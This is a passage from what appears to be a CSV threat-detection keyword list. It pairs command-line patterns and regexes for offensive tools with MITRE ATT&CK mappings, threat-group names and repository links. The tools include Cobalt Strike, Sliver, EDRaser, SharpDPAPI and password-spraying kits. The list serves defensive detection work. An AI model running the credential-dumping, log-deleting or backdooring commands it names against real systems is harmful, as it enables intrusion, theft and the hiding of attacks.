- T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --assemblyargs AntiVirus*",".{0,1000}\s\-\-assemblyargs\sAntiVirus.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --assemblyargs AppLocker*",".{0,1000}\s\-\-assemblyargs\sAppLocker.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* Athena.Commands*",".{0,1000}\sAthena\.Commands.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* Athena.Models.*",".{0,1000}\sAthena\.Models\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* athena.mythic*",".{0,1000}\sathena\.mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "* atomizer.py *",".{0,1000}\satomizer\.py\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","9","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* --attack bruteforce*",".{0,1000}\s\-\-attack\sbruteforce.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* --attack injection*",".{0,1000}\s\-\-attack\sinjection.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* --attack partial_d --key *",".{0,1000}\s\-\-attack\spartial_d\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --attack partial_q --key *",".{0,1000}\s\-\-attack\spartial_q\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -attack remote_db -db_type * -db_username * -db_password *",".{0,1000}\s\-attack\sremote_db\s\-db_type\s.{0,1000}\s\-db_username\s.{0,1000}\s\-db_password\s.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* --attack vulns *",".{0,1000}\s\-\-attack\svulns\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* -attack windows_application_event_log_local*",".{0,1000}\s\-attack\swindows_application_event_log_local.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* -attack windows_event_log*",".{0,1000}\s\-attack\swindows_event_log.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* -attack windows_security_event_log_remote*",".{0,1000}\s\-attack\swindows_security_event_log_remote.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* --attacker-host *",".{0,1000}\s\-\-attacker\-host\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "* --attacker-port *",".{0,1000}\s\-\-attacker\-port\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "* -attak syslog*",".{0,1000}\s\-attak\ssyslog.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "* audit AlwaysInstallElevated*",".{0,1000}\saudit\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit CachedGPPPassword*",".{0,1000}\saudit\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit DomainGPPPassword*",".{0,1000}\saudit\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit HijackablePaths*",".{0,1000}\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit McAfeeSitelistFiles*",".{0,1000}\saudit\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableScheduledTask*",".{0,1000}\saudit\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableServiceBinaries*",".{0,1000}\saudit\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableServiceRegistryKeys*",".{0,1000}\saudit\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ModifiableServices*",".{0,1000}\saudit\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit ProcessDLLHijack*",".{0,1000}\saudit\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit RegistryAutoLogons*",".{0,1000}\saudit\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit RegistryAutoruns*",".{0,1000}\saudit\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit TokenPrivileges*",".{0,1000}\saudit\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit UnattendedInstallFiles*",".{0,1000}\saudit\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* audit UnquotedServicePath*",".{0,1000}\saudit\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "* --authmode ntlm --username * --password *",".{0,1000}\s\-\-authmode\sntlm\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "* Author:ph4ntom*",".{0,1000}\sAuthor\:ph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "* auth-owners.nse*",".{0,1000}\sauth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* auth-spoof.nse*",".{0,1000}\sauth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* autorecon.py *",".{0,1000}\sautorecon\.py\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "* AutoSUID.sh*",".{0,1000}\sAutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* avred.py *",".{0,1000}\savred\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "* avredweb.py *",".{0,1000}\savredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "* awsloot.py*",".{0,1000}\sawsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "* -b *.bin *.bin dump*",".{0,1000}\s\-b\s.{0,1000}\.bin\s.{0,1000}\.bin\sdump.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "* BabelStrike.py*",".{0,1000}\sBabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "* --backdoor *",".{0,1000}\s\-\-backdoor\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "* backdoor --profile windows-shellcode *",".{0,1000}\sbackdoor\s\-\-profile\swindows\-shellcode\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* backdoor.py*",".{0,1000}\sbackdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* backorifice-brute.nse*",".{0,1000}\sbackorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* backorifice-info.nse*",".{0,1000}\sbackorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* backupcreds.exe*",".{0,1000}\sbackupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "* backupkey* /server:* /file*.pvk*",".{0,1000}\sbackupkey.{0,1000}\s\/server\:.{0,1000}\s\/file.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* bacnet-info.nse*",".{0,1000}\sbacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* badrat.ps1*",".{0,1000}\sbadrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* badrat_cs.exe*",".{0,1000}\sbadrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* badrat_server.py*",".{0,1000}\sbadrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* banner.nse*",".{0,1000}\sbanner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* base64_encode_shellcode*",".{0,1000}\sbase64_encode_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "* --basic ""FUZZ:FUZ2Z""*",".{0,1000}\s\-\-basic\s\""FUZZ\:FUZ2Z\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 